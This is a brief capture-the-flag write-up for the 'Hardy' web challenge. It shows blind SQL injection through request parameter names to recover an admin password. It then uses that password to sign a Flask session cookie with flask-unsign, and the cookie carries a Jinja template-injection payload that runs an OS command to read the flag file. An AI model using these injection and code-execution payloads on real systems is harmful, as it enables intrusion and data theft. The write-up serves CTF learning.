Web - Hardy

No source code was provided

Solution

The parameter names are vulnerable to SQL Injection

Dumping the admin password

username=admin&SUBSTRING(password,1,1)=I

username=admin&SUBSTRING(password,1,2)=IL

username=admin&SUBSTRING(password,1,3)=ILI

ILIKEpotatoesSOMUCH::&& is the password for the admin

the password also is being used as a JWT secret and the application is vulnerable to SSTI {'type':'{{<payload>}}'}

The Flag

flask-unsign --sign \ 
--cookie "{'type': '{{cycler.__init__.__globals__.os.popen(\"cat /flag_086bf2851588e4e353fecee934635e09.txt\").read()}}'}" \
--secret "ILIKEpotatoesSOMUCH::&&"

PreviousBlackHatMEA Quals 2023 NextWeb - Authy

Last updated 6 months ago